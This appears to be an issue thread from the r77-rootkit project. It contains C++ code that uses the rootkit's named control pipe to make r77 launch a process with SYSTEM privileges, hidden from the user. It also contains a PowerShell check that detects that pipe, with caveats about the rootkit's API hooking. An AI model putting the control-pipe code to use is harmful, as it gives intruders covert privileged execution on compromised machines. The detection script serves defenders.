Comments (2)
There's no need to modify r77 itself to achieve that. Once r77 is installed & running, you can communicate with the rootkit service through a named pipe. When you send CONTROL_USER_SHELLEXEC, r77 executes a file with SYSTEM privileges for you - and that executable should delete those files, etc.
There are more control codes, see the documentation for an exhaustive list. Here is an example of how to use one particular control code.
Look at the example in ControlPipe.cpp
```cpp
#include <Windows.h>

// This example demonstrates how to make r77 perform a ShellExecute.
// All other control codes work similarly.

#define CONTROL_USER_SHELLEXEC 0x3001 // These constants can be found in r77def.h or in the technical documentation

int main()
{
    // Connect to the r77 service. The rootkit must be installed.
    HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\$77control", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (pipe != INVALID_HANDLE_VALUE)
    {
        DWORD controlCode = CONTROL_USER_SHELLEXEC;
        WCHAR shellExecPath[] = L"C:\\Windows\\System32\\notepad.exe";
        WCHAR shellExecCommandline[] = L"mytextfile.txt";

        // Write control code (DWORD)
        DWORD bytesWritten;
        WriteFile(pipe, &controlCode, sizeof(DWORD), &bytesWritten, NULL);

        // Write the path for ShellExec (unicode string including null terminator)
        WriteFile(pipe, shellExecPath, (lstrlenW(shellExecPath) + 1) * 2, &bytesWritten, NULL);

        // Write arguments for ShellExec
        WriteFile(pipe, shellExecCommandline, (lstrlenW(shellExecCommandline) + 1) * 2, &bytesWritten, NULL);

        // Now, a new process "notepad.exe mytextfile.txt" will spawn.
        // You will only see it in TaskMgr. Because this process is running under the SYSTEM user, it does not show up on the desktop.

        // Use the Test Console to try out different control codes.

        CloseHandle(pipe);
    }

    return 0;
}
```
from r77-rootkit.
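The comment above gives defenders one concrete artifact: a running r77 service listens on the named pipe `\\.\pipe\$77control`. The following PowerShell check is an added example, not code from the r77 project or this thread; it assumes only that pipe name and enumerates the local pipe namespace to see whether the endpoint exists. `Test-R77ControlPipe` is a hypothetical name introduced here.

```powershell
# Added detection check (not from the r77 project). It relies only on the pipe
# name quoted in the ControlPipe.cpp example: \\.\pipe\$77control.
function Test-R77ControlPipe {
    [CmdletBinding()]
    param(
        # Name of the control pipe as shown on this page.
        [string]$PipeName = '$77control'
    )

    # Listing \\.\pipe\ enumerates every named pipe currently open on this host.
    $pipes = [System.IO.Directory]::GetFiles('\\.\pipe\')

    # Compare on the bare pipe name so the prefix \\.\pipe\ does not matter.
    $match = $pipes | Where-Object {
        [System.IO.Path]::GetFileName($_) -eq $PipeName
    }

    [PSCustomObject]@{
        PipeName   = $PipeName
        Present    = [bool]$match
        PipesSeen  = $pipes.Count
    }
}

$result = Test-R77ControlPipe
if ($result.Present) {
    # A positive hit is strong evidence: a process has created the r77 control endpoint.
    # Capture the process list and pipe ownership before any remediation changes state.
    Write-Warning "Named pipe \\.\pipe\$($result.PipeName) exists: an r77 service appears to be running."
} else {
    Write-Output "No pipe named $($result.PipeName) among $($result.PipesSeen) pipes."
}
```

Treat a negative result as weaker evidence than a positive one: r77 hides itself by hooking user-mode APIs in processes it has injected, so a listing taken from a compromised process can be filtered; corroborate with telemetry gathered outside that process.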
Closed due to inactivity.
from r77-rootkit.